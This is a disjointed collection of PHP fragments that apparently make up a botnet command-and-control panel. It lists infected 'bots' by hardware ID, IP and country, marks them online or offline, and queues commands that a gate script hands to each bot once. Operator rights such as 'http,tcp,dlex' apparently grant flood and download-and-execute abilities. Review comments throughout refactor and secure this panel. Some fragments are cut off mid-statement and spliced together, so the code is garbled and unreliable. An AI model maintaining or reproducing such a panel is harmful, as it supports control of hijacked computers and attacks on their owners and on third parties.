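/**
 * Build the strip of country flags for the most frequent values of bots.country.
 *
 * One <label><img></label> element is produced per non-empty country, ordered by
 * how many rows of the bots table carry that country. Each image's OnClick passes
 * the country followed by a comma to a JavaScript function add(), which is defined
 * outside this block.
 *
 * Changes against the original: the total-count query and the per-country count
 * query are gone, because their results ($alle, $zahl, $total, $array) were
 * computed and never used; $countries is initialised, so the function returns ''
 * instead of an undefined variable when nothing matches; the unquoted array key
 * `$row[count]` disappears with the dead code.
 *
 * @param mixed $limit Truthy selects LIMIT 0,10; falsy selects LIMIT 10,20.
 * @return string HTML fragment, '' when the query fails or yields no usable row.
 */
function get_top20($limit)
{
    // NOTE(review): in MySQL "LIMIT 10,20" means "skip 10 rows, return up to 20",
    // i.e. ranks 11-30. If ranks 11-20 were intended this should be "10,10" - confirm.
    $range = $limit ? '0,10' : '10,20';

    // Only the country column is read below, so it is the only one selected.
    // The statement contains no request data; both LIMIT values are fixed strings.
    // NOTE(review): the mysql_* extension was removed in PHP 7.0. Moving to mysqli or
    // PDO needs the connection setup, which is not visible in this block.
    $result = mysql_query(
        "SELECT country FROM bots GROUP BY country HAVING count(country) >= 1 "
        . "ORDER BY count(country) DESC LIMIT " . $range
    );

    $countries = '';
    if ($result === false) {
        return $countries;
    }

    while ($row = mysql_fetch_array($result)) {
        // The value is escaped here and again at output, exactly as the original
        // did, so the emitted markup stays identical.
        $country = safe_xss($row['country']);
        if (empty($country)) {
            continue;
        }

        // NOTE(review): $country is stored data that ends up in a URL path and inside
        // a quoted JavaScript string in an HTML attribute. Whether safe_xss() is
        // sufficient for both contexts cannot be judged from here; validating the
        // value against the expected country-code format before output would remove
        // the dependency on it.
        $countries .= '<label style="display: inline-block; width: 2em;"><img src="../img/flags/'.safe_xss($country).'.gif" OnClick="add(\''.safe_xss($country).',\');" /></label>';
    }

    return $countries;
}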
//Delete if(isset($_GET['cmd'])){ $cmd = safe_xss($_GET['cmd']); mysql_query("DELETE FROM tasks WHERE command = '".safe_sql($cmd)."'"); mysql_query("DELETE FROM tasks_done WHERE command = '".safe_sql($cmd)."'"); echo '<meta http-equiv="refresh" content="0; URL=befehle.php">'; } if(isset($_GET['deletetasks'])){ if(safe_xss($_GET['del']) == '1'){ $query = mysql_query("SELECT id FROM tasks WHERE bots = done"); while($row = mysql_fetch_array($query)){ $id = safe_xss($row['id']); $result1 = mysql_query("DELETE FROM tasks WHERE id = '".safe_sql($id)."'"); $result2 = mysql_query("DELETE FROM tasks_done WHERE id = '".safe_sql($id)."'"); } if(!$result1 || !$result2){ die('<script>alert("Fehler - Kein Task beendet?");</script> <meta http-equiv="refresh" content="0; URL=befehle.php">'); }else{ echo '<script>alert("Erfolgreich entfernt");</script> <meta http-equiv="refresh" content="0; URL=befehle.php">'; } } if($_GET['del'] == '2'){ $result1 = mysql_query("DELETE FROM tasks");
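// Table body: one <tr> per record of $query1. The result set, $options, $nav,
// $time_now and $seconds are all created before this section.
while ($row = mysql_fetch_array($query1)) {
    $status = safe_xss($row['status']);

    echo '<tr> <td style="">'.safe_xss($row['id']).'</td>';

    if (empty($row['country'])) {
        // No country recorded: use the placeholder flag.
        echo '<td style=""><img src="img/flags/00.gif" /></td>';
    } else {
        $code = safe_xss($row['country']);
        $key = strtoupper($code);
        // A code missing from the lookup table used to raise an undefined-index
        // notice; it now yields an empty name.
        // NOTE(review): the looked-up name is printed without escaping, as in the
        // original - acceptable only if $options is a static table; confirm.
        $name = isset($options[$key]) ? $options[$key] : '';
        echo '<td style=""><img src="img/flags/'.$code.'.gif" /> '.$name.'</td>';
    }

    echo ' <td style="">'.safe_xss($row['pc']).'@'.safe_xss($row['hwid']).'@'.safe_xss($row['ip']).'</td> <td style="">'.safe_xss($row['install']).'</td> <td style="">'.safe_xss($row['time']).'</td>';

    if ($status == '1') {
        echo '<td style="color: green;">Online</td>';
    } else {
        echo '<td style="color: red;">Offline</td>';
    }

    // The original never closed the row, leaving the table markup malformed.
    echo '</tr>';
}

echo '</table><br /><div style="float: right; font-size: 11px;">'.$nav->createPageBar().'</div><br />';

// Mark every record whose last `time` is older than $seconds as offline.
// $seconds is forced to an integer because it is concatenated into the statement.
// NOTE(review): $time_now is interpolated inside quotes without escaping. That is
// only safe if it is generated server-side (e.g. by date()); confirm where it is set.
$query = "UPDATE bots SET status = 0 WHERE DATE_SUB('$time_now', INTERVAL ".(int) $seconds." SECOND) > time";
if (!mysql_query($query)) {
    // Keep the driver's error text in the server log instead of sending it to the
    // browser, where it would disclose schema details.
    error_log('bots status update failed: '.mysql_error());
    die('Datenbankfehler');
}

require_once('inc/footer.php');
?>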
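<?php
/*
 * Login handler.
 *
 * Redirects to index.php when the session is already marked as logged in.
 * On a POST carrying `login`, looks the credentials up in the users table and on
 * success sets $_SESSION['seclogin'], $_SESSION['secuser'] and, for rows with
 * admin = '1', $_SESSION['admin']. $error holds the status markup for the page.
 *
 * Changes against the original: the session id is regenerated on successful login
 * (session fixation), the duplicated SELECT is run once, missing or non-string
 * POST fields and a failed query no longer raise notices or warnings.
 */
session_start();
require_once('inc/config.php');
require_once('other/safe.php');

// !empty() instead of a bare read: the key does not exist on a fresh session.
if (!empty($_SESSION['seclogin'])) {
    header('Location: index.php');
    exit();
}

if (isset($_POST['login'])) {
    $user = (isset($_POST['user']) && is_string($_POST['user'])) ? $_POST['user'] : '';
    $plain = (isset($_POST['pass']) && is_string($_POST['pass'])) ? $_POST['pass'] : '';

    // NOTE(review): sha1(md5()) is an unsalted, fast hash. password_hash() and
    // password_verify() are the replacement, but the stored values would have to be
    // migrated. The password is also passed through safe_xss() before hashing here,
    // while the adduser.php fragment on this page hashes the raw value; if safe_xss()
    // alters the string the two will never match - confirm which form is stored.
    $pass = sha1(md5(safe_xss($plain)));

    // NOTE(review): the username comparison appears as '******' on this page, which
    // looks like masking applied by the site the listing came from. It is reproduced
    // unchanged; the real file must compare against $user, quoted the same way as
    // the password (safe_sql) or, better, bound as a prepared-statement parameter.
    $exist = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");

    if ($exist !== false && mysql_num_rows($exist)) {
        // New session id at the privilege change, so an id known before login
        // cannot be reused afterwards.
        session_regenerate_id(true);

        $_SESSION['seclogin'] = true;
        $_SESSION['secuser'] = $user;

        // mysql_num_rows() does not consume rows, so the same result set can be
        // read here; the original issued an identical second query for this.
        while ($row = mysql_fetch_array($exist)) {
            if ($row['admin'] == '1') {
                $_SESSION['admin'] = true;
            }
        }

        $error = '<img src="img/accept.png" /> Bitte warten...<meta http-equiv="refresh" content="3; URL=index.php">';
    } else {
        $error = '<img src="img/del.png" /> Fehlgeschlagen';
    }
}
?>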
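<style type="text/css">
body{ font-size: 11px; font-family: Tahoma; }
label{ display: inline-block; width: 14em; }
</style>
<?php
/*
 * Lists the countries stored for one task: a flag image and the country name for
 * each entry of the comma-separated tasks.countries column of the row whose id
 * is given in the `id` query parameter.
 *
 * NOTE(review): no session or login check is visible in this file. Unless
 * inc/config.php enforces one, the page answers to any visitor - confirm.
 */
require_once('../inc/config.php');
require_once('../other/safe.php');
require_once('../other/code2country.php');

// A missing or array-valued parameter is treated as an empty id instead of
// raising a notice or handing an array to the escaping helper.
$id = (isset($_GET['id']) && is_string($_GET['id'])) ? safe_xss($_GET['id']) : '';

// NOTE(review): if tasks.id is numeric, an (int) cast would be a stricter guard
// than string escaping; the column type is not visible here.
$query1 = mysql_query("SELECT * FROM tasks WHERE id = '".safe_sql($id)."'");

if ($query1 !== false) {
    while ($row = mysql_fetch_array($query1)) {
        // The whole list is escaped once, then split. As in the original, the last
        // element is dropped (the stored list appears to end with a comma).
        $split = explode(',', safe_xss($row['countries']));
        $codes = array_slice($split, 0, -1);

        foreach ($codes as $code) {
            $key = strtoupper($code);
            // Unknown codes give an empty name rather than an undefined-index notice.
            $name = isset($options[$key]) ? $options[$key] : '';
            echo '<img src="../img/flags/'.$code.'.gif" /> '.$name.'<br />';
        }
    }
}
?>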
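// Per-country breakdown of the records whose `install` value contains $today:
// one table row per country with flag, count and share of today's total.
// $today is set before this section.
//
// Changes against the original: $today is escaped before it enters the SQL text;
// the per-country count comes from the grouped query itself, which removes the
// extra query per row that interpolated $country without SQL escaping; the
// unquoted key `$row[count]` is quoted; a zero total no longer divides by zero.
// NOTE(review): LIKE wildcards (% and _) inside $today are not neutralised;
// harmless if the value is a server-generated date - confirm.
$todaySql = mysql_real_escape_string($today);

$alle = 0;
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE install LIKE '%".$todaySql."%'");
if ($query1 !== false) {
    while ($row = mysql_fetch_array($query1)) {
        $alle = safe_xss($row['count']);
    }
}

$query2 = mysql_query(
    "SELECT country, COUNT(*) AS count FROM bots WHERE install LIKE '%".$todaySql."%' "
    . "GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10"
);

if ($query2 !== false) {
    while ($row = mysql_fetch_array($query2)) {
        $country = safe_xss($row['country']);
        $zahl = safe_xss($row['count']);
        $total = ($alle > 0) ? $zahl / $alle * 100 : 0;

        // An empty country gets the placeholder flag; the rest of the row is the same.
        $flag = ($country == '') ? '00' : safe_xss($country);

        echo '<tr><td><img src="img/flags/'.$flag.'.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss(round($total, 1)).'%</td></tr>';
    }
}

echo '</table>';
?>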
<?php if(!$_SESSION['admin']){ echo 'Keine Berechtigung!'; exit(); } if(isset($_POST['adduser'])){ if($_POST['token'] !== $_SESSION['token3']){ echo 'Token falsch'; exit(); }else{ $user_add = safe_xss($_POST['user']); $pass_add = safe_xss(sha1(md5($_POST['pass']))); $rechte_add = safe_xss($_POST['rechte']); $admin_add = safe_xss($_POST['admin']); mysql_query("INSERT INTO users (user, pw, rechte, admin) VALUES ('".safe_sql($user_add)."', '".safe_sql($pass_add)."', '".safe_sql($rechte_add)."', '".safe_sql($admin_add)."')"); echo 'Bitte warten... <meta http-equiv="refresh" content="2; URL=benutzer.php">'; } }else{ $_SESSION['token3'] = uniqid(md5(microtime()), true); ?> <form action="adduser.php" method="post"> <b>Benutzer</b><p><input type="text" name="user" /></p> <b>Passwort</b><p><input type="pass" name="pass" /></p> <b>Rechte</b><p><input type="text" name="rechte" value="z.B http,tcp,dlex" /></p> <input type="hidden" name="token" value="<?php echo $_SESSION['token3']; ?>" /> <br />
$time_out = safe_xss($row['time']); //$date_old = new DateTime($time_out); //$date_new = $date_old->getTimestamp(); $date_old = date_create($row['time']); $date_new = date_timestamp_get($date_old); if($date_new <= $time){ $command = $row['command']; $q2 = mysql_query("SELECT * FROM tasks WHERE command = '".safe_sql($command)."'"); while($row = mysql_fetch_array($q2)) { $done = safe_xss($row['done']); $bots = safe_xss($row['bots']); $add = $done+1; } if($done != $bots){ $q3 = "SELECT * FROM tasks_done WHERE hwid = '".safe_sql($hwid)."' AND command = '".safe_sql($command)."'"; $count = mysql_query($q3); if(!mysql_num_rows($count)){ echo '$'.$command.'$'; mysql_query("UPDATE tasks Set done = '$add' WHERE command = '".safe_sql($command)."'"); mysql_query("INSERT INTO tasks_done (hwid, command) VALUES ('".safe_sql($hwid)."', '".safe_sql($command)."')"); }
<input type="hidden" name="token" value="'.$_SESSION['token2'].'" /> <input type="hidden" name="id" value="'.safe_xss($id).'" /> <p><b>Zum ändern entweder <b>1</b> (Für Admin Rechte) oder 0 (Für User) schreiben bei Gruppe</b></p> </form>'; }else{ $_SESSION['token'] = uniqid(md5(microtime()), true); $query1 = mysql_query("SELECT * FROM users"); while($row = mysql_fetch_array($query1)) { echo '<tr> <td>'.admin($row['admin']).'</td> <td>'.safe_xss($row['user']).'</td> <td>'.safe_xss($row['rechte']).'</td> <td><a href="benutzer.php?delid='.safe_xss($row['id']).'&token='.$_SESSION['token'].'" onClick="javascript:return(confirm(\'Benutzer wirklich entfernen?\'))"><img src="img/del.png" /></a></td> <td><a href="benutzer.php?editid='.safe_xss($row['id']).'"><img src="img/edit.png" /></a></td> </tr>'; } echo '<img src="img/add.png" /> <a href="adduser.php" style="color: black; text-decoration: none;">Benutzer hinzufügen</a>'; } function admin($a){ if($a == '1'){ return 'Admin'; }else{ return 'User'; } } ?> </table>